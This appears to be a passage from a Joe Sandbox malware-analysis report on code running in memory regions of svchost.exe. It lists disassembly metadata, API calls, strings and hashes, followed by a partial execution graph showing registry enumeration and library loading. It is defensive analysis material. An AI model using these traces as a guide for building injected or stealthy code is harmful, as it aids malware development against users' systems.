                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 8ef73a6d17c5181fc26fe53d14bc71b85ee070806e4b74a87cb371eb949d1953
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 0CF0447271869592F7619B65F4E43D96771F745B8CF848022CA8D47664EF3CC68CCB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: c83c9d28c704160dc0fe5e41b9c2bf0097c43b62eeb3fda8efb59c4134b346ee
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: E7F08930B18BA091FA054B93B9541955330E749FD4F088132DD9E07B58DE2CC4898300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 73b6b03aab83e1f99a9798063c3f49f6cbb5a15b6ebe00f4a351a76d1d355aef
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 2EF08271B29A54A1FF864FA0E8A43E52370EF49B88F04241B954F46360EF38C4DCCB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 0468c56e32e5ecdb93a49922f01a9dced457731f4c5f6c1fead8d90b8d7d76dc
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 5902A93662DB9086E761CB59E49439AB7B1F3C5798F104116EACE87BA8DF7CC448CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: f04de11a177723f6a12d5930976192a82fc46b7b5d768117d5fc1aa130b5f10a
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: FE81CE32E28A7489FB529B6598A03ED2BB1F746B8CF444517DE4E53B92FB34844EC710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: 5a11ddcfa039438ed463471aaed5abd3b60112fcee3bb98f83115015e23af584
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: B961BA3692DB94C6E7618B19E49435AB7B0F389768F100116FACD87BA8DB7CC548CF40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2926338703.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_17953770000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: ad0af8ccf25c9a2e923504ff5f7ec24561113f6063c2958b79c18a5040c978d4
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 1511E932E5CE3001F6671165E4923E993707B6F77CF484737AA7F46FD68A188C494101
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 10caee5077c3ef502bec3471ed2fb945522b50dfd098a07731f745d70388336d
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 2011A332E5EA30C9F69A1168E4763E513716B6737CF044636FA7E067D7EB148C49C100
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 741cd371535e58e4f55e2cdc5e18ad35b61bb847470f44393e0482604e6d7ada
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 1C113C3AB18B5482FB169F91F4146A9A7B5FB4AB88F04002ADE8D07B94FF3DC548C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2926338703.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_17953770000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 31aee347fee61d2d614974f151fdafca9f87d8d84b0641efe70a5bb4441efe65
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 8051D132B1A220AADB27DF25E445B9837F5F342BDCF518126DA0E87789DB34E849C705
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2926338703.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_17953770000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: b0723f28f7a0575ea5fdd575e6fa23e0190c7b56bffab0f33ecf9d8e6447e11b
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: E131EE72A09660A6E713DF12E885B9937F8F342BDCF158116EE4E07784CB38E949C709
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: 3302e18425058611f86b48afbc7a7a9cc7d1bf90f6bb5665c9e7b62b11099c6e
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: E211B236918FA896F752CFA6A81429A7774F78AF88F04401ADB8E03714EF38C095C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 6365e74ea41314e2c76e16990aea213b6aecc0aa63ce0f0888ada0406651787d
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: C671F432A2C7A185E76ADF6599543EAA7B0F746B8CF440017DE4D57B88DF35CA88C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 684cc52012bf08a02ea854e3c5e00fd2e482725b670355f3805120c974a84c5f
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 4651F732A2D7A182E6769E29E1543EA6771F387788F000027CD8E03F99DE35C4898B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: b43d16757bf5e9589a98c71ae9370e20613dc249c4dd67caf5abf271398e3e89
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: F841C672B18A9482EB21DF25E4543DAB7B1F789788F404026EE8D87798EF3CC545CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 41f5f8c1b6d9781716885eb7728698c86a40eb5a14e32fd4e6294361c62e05b2
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: FC114A36A08B9086DB65CB56F45029AB7B4F7CABC4F54412AEE8D83B59DF38C554CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: d9042d3ab88ee03dd59a299df3f7f2bc7607c62d41262829ace1d5b1cd0866a9
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 8B111F32618B9482EB618F15E44029E77B5F789B98F184222DF8D07764EF3CC555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 97157dce8ab8c9e342e1a495dafd4371ef732dfcfaa4e487683373aa742c3c2c
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 0BF0A731B287A091FB07AB85F4506D56331EB89BD8F495027EA5D13B54DF38C9ADC700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2926338703.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_17953770000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: d29161db2d5e58e77a19aeec2b0767fee3f9300d5dbd27e93e65991b3153c9da
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: C4E09231E0C65292FA179B52F4442E4A3B19B8974CF595123A61D06366CE38C89E8740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 9711712e3d408104b7a636f22671f09248094bbe1e46c96de628ba518baa1951
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: F5E06D71A1865091FA0A5B90F8247D52332AB897C8F494023DA1D06395EE38C9ADC710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001C.00000002.2927160762.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_28_2_179537a0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 33a1b714b105d773c2c5a18b45ff3f86a857af4a48be75d1c83c01d21736f56c
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 01219532A18FA481FB128F59E40429AF3B4FB85B99F454116DE8C47B14FF78C58A8700

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 14017 2295d561c28 14022 2295d561650 GetProcessHeap HeapAlloc 14017->14022 14019 2295d561c3e Sleep SleepEx 14020 2295d561c37 14019->14020 14020->14019 14021 2295d5615c0 StrCmpIW StrCmpW 14020->14021 14021->14020 14066 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14022->14066 14024 2295d561678 14067 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14024->14067 14026 2295d561689 14068 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14026->14068 14028 2295d561692 14069 2295d561274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14028->14069 14030 2295d56169b 14031 2295d5616b6 RegOpenKeyExW 14030->14031 14032 2295d5618ce 14031->14032 14033 2295d5616e8 RegOpenKeyExW 14031->14033 14032->14020 14034 2295d561727 RegOpenKeyExW 14033->14034 14035 2295d561711 14033->14035 14036 2295d56174b 14034->14036 14037 2295d561762 RegOpenKeyExW 14034->14037 14070 2295d5612c8 RegQueryInfoKeyW 14035->14070 14080 2295d56104c RegQueryInfoKeyW 14036->14080 14040 2295d56179d RegOpenKeyExW 14037->14040 14041 2295d561786 14037->14041 14045 2295d5617d8 RegOpenKeyExW 14040->14045 14046 2295d5617c1 14040->14046 14044 2295d5612c8 16 API calls 14041->14044 14047 2295d561793 RegCloseKey 14044->14047 14049 2295d5617fc 14045->14049 14050 2295d561813 RegOpenKeyExW 14045->14050 14048 2295d5612c8 16 API calls 14046->14048 14047->14040 14053 2295d5617ce RegCloseKey 14048->14053 14054 2295d5612c8 16 API calls 14049->14054 14051 2295d56184e RegOpenKeyExW 14050->14051 14052 2295d561837 14050->14052 14056 2295d561889 RegOpenKeyExW 14051->14056 14057 2295d561872 14051->14057 14055 2295d56104c 6 API calls 14052->14055 14053->14045 14058 2295d561809 RegCloseKey 14054->14058 14059 2295d561844 RegCloseKey 14055->14059 14061 2295d5618ad 14056->14061 14062 2295d5618c4 RegCloseKey 14056->14062 14060 2295d56104c 6 API calls 14057->14060 14058->14050 14059->14051 14063 2295d56187f RegCloseKey 14060->14063 14064 2295d56104c 6 API calls 14061->14064 14062->14032 14063->14056 14065 2295d5618ba RegCloseKey 14064->14065 14065->14062 14066->14024 14067->14026 14068->14028 14069->14030 14071 2295d561499 RegCloseKey 14070->14071 14072 2295d561334 GetProcessHeap HeapAlloc 14070->14072 14071->14034 14073 2295d56135d RegEnumValueW 14072->14073 14074 2295d561485 GetProcessHeap HeapFree 14072->14074 14076 2295d5613af 14073->14076 14074->14071 14076->14073 14076->14074 14077 2295d56142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14076->14077 14078 2295d5613dd GetProcessHeap HeapAlloc 14076->14078 14079 2295d561413 GetProcessHeap HeapFree 14076->14079 14086 2295d561554 14076->14086 14077->14076 14078->14076 14079->14077 14081 2295d5611b5 RegCloseKey 14080->14081 14084 2295d5610b9 14080->14084 14081->14037 14082 2295d5610c7 RegEnumValueW 14082->14084 14083 2295d561149 GetProcessHeap HeapAlloc 14083->14084 14084->14081 14084->14082 14084->14083 14085 2295d56117f GetProcessHeap HeapFree 14084->14085 14085->14084 14087 2295d5615a4 14086->14087 14090 2295d56156e 14086->14090 14087->14076 14088 2295d56158d StrCmpW 14088->14090 14089 2295d561585 StrCmpIW 14089->14090 14090->14087 14090->14088 14090->14089 14091 2295d532908 14093 2295d532936 14091->14093 14092 2295d532a2b LoadLibraryA 14092->14093 14093->14092 14094 2295d532aa7 14093->14094

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: 5fa08749519fdd083dd3e1f0d39032132afecf1b20116e9cc23eacd99de3edae
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: D8113C6171070271FB2797E9B50E7696294F794746FD80029FB168529CEF39C0EAC630

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000002295D561650: GetProcessHeap.KERNEL32 ref: 000002295D56165B
                                                  • Part of subcall function 000002295D561650: HeapAlloc.KERNEL32 ref: 000002295D56166A
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5616DA
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561707
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561721
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561741
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D56175C
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D56177C
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561797
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5617B7
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5617D2
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5617F2
                                                • Sleep.KERNEL32 ref: 000002295D561C43
                                                • SleepEx.KERNEL32 ref: 000002295D561C49
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D56180D
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D56182D
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561848
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D561868
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D561883
                                                  • Part of subcall function 000002295D561650: RegOpenKeyExW.ADVAPI32 ref: 000002295D5618A3
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5618BE
                                                  • Part of subcall function 000002295D561650: RegCloseKey.ADVAPI32 ref: 000002295D5618C8
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 821f73ed8f2b7e9f5efbed1530173072f609ca8afc59f27a2d85262a82f8ebfe
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: 7031EF65702601B1FE569FBEF64977A12A4AB44BC5FD44021EE09C769EEE14C8F2C270

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 57 2295d563930-2295d56393b 58 2295d56393d-2295d563950 StrCmpNIW 57->58 59 2295d563955-2295d56395c 57->59 58->59 60 2295d563952 58->60 60->59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926841705.000002295D560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D560000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d560000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
                                                • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction ID: 6065884056ec97f2f48920713d01fdf3d33b039ec21e88ccf8d5ed595a0e7037
                                                • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                • Instruction Fuzzy Hash: A2D0A76031120BA6FF16DFE9D8C92602350EB14754FC88020DB050211CD7188DEFCB30

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.2926248027.000002295D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002295D530000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2295d530000_svchost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction ID: 58ff464dfdc6c4ecbc8e9b3855974d3a25b238110f5a3486ce761eece11ac661
                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                • Instruction Fuzzy Hash: 0B610422701A91A7EE6ACF9DD45476CB391FF14B94FD48015EA1907789DB38D8E3C720

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 2295d562cdc-2295d562d55 call 2295d57ecc0 210 2295d563090-2295d5630b3 207->210 211 2295d562d5b-2295d562d61 207->211 211->210 212 2295d562d67-2295d562d6a 211->212 212->210 213 2295d562d70-2295d562d73 212->213 213->210 214 2295d562d79-2295d562d89 GetModuleHandleA 213->214 215 2295d562d9d 214->215 216 2295d562d8b-2295d562d9b call 2295d573090 214->216 218 2295d562da0-2295d562dbe 215->218 216->218 218->210 221 2295d562dc4-2295d562de3 StrCmpNIW 218->221 221->210 222 2295d562de9-2295d562ded 221->222 222->210 223 2295d562df3-2295d562dfd 222->223 223->210 224 2295d562e03-2295d562e0a 223->224 224->210 225 2295d562e10-2295d562e23 224->225 226 2295d562e25-2295d562e31 225->226 227 2295d562e33 225->227 228 2295d562e36-2295d562e3a 226->228 227->228 229 2295d562e3c-2295d562e48 228->229 230 2295d562e4a 228->230 231 2295d562e4d-2295d562e57 229->231 230->231 232 2295d562f4d-2295d562f51 231->232 233 2295d562e5d-2295d562e60 231->233 236 2295d562f57-2295d562f5a 232->236 237 2295d563082-2295d56308a 232->237 234 2295d562e72-2295d562e7c 233->234 235 2295d562e62-2295d562e6f call 2295d561a14 233->235 239 2295d562eb0-2295d562eba 234->239 240 2295d562e7e-2295d562e8b 234->240 235->234 241 2295d562f6b-2295d562f75 236->241 242 2295d562f5c-2295d562f68 call 2295d561a14 236->242 237->210 237->225 247 2295d562ebc-2295d562ec9 239->247 248 2295d562eea-2295d562eed 239->248 240->239 246 2295d562e8d-2295d562e9a 240->246 243 2295d562f77-2295d562f84 241->243 244 2295d562fa5-2295d562fa8 241->244 242->241 243->244 253 2295d562f86-2295d562f93 243->253 254 2295d562faa-2295d562fb3 call 2295d561d28 244->254 255 2295d562fb5-2295d562fc2 lstrlenW 244->255 256 